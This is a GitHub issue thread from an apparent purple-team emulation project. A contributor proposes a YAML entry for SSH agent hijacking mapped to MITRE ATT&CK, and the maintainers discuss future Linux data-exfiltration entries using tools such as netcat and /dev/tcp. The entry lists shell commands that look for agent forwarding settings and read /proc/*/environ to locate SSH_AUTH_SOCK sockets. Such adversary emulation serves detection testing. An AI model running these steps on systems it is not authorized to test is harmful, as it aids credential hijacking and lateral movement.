-
Notifications
You must be signed in to change notification settings - Fork 151
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SSH Hijacking linux lateral movement addition proposal #9
Comments
@paragonsec if you submit a diff with the actual yaml file i would be able to merge these faster. -CG |
@carnal0wnage Created a pull request with the purposed file. Thanks! |
@carnal0wnage Question outside of this issue. I am putting together data exfil techniques on Linux for this project. However, there are a ton of different methods like using netcat, /dev/tcp, telnet, DNS, ssh, etc... Would it be better to separate them to their own specific yml file according to technique like one for nc, one for dns, etc...? |
If they are the same technique i think you can put them in one file. People can grab a line or two and make their own yaml...that's the vision anyway :-) |
Sounds good. Will try not to get to carried away with this lol. This is an awesome project! |
thanks! i really appreciate you submitting things. keep em coming :-) |
accepted the diff. thanks again! |
Below is my proposal for SSH Hijacking for lateral movement.
enabled: true
meta:
author: paragonsec
created: 2018-03-22
decorations:
description: Lateral Movement with SSH Agent Hijacking
link: https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking
mitre_link: https://attack.mitre.org/wiki/Technique/T1184
mitre_attack_phase: Lateral Movement
mitre_attack_technique: Lateral Movement with SSH Agent Hijacking
purple_actions:
1: grep ~/.ssh/config -e ForwardAgent > ssh_config.txt
2: ps ef |grep -i -e "ssh-agent" > ssh_process.txt
3: cat /proc/*/environ |tr -s '\0' '\n' | grep SSH_AUTH_SOCK |sort -u 2>/dev/null > ssh_agent.txt
os: linux
name: Lateral Movement with SSH Agent Hijacking
The text was updated successfully, but these errors were encountered: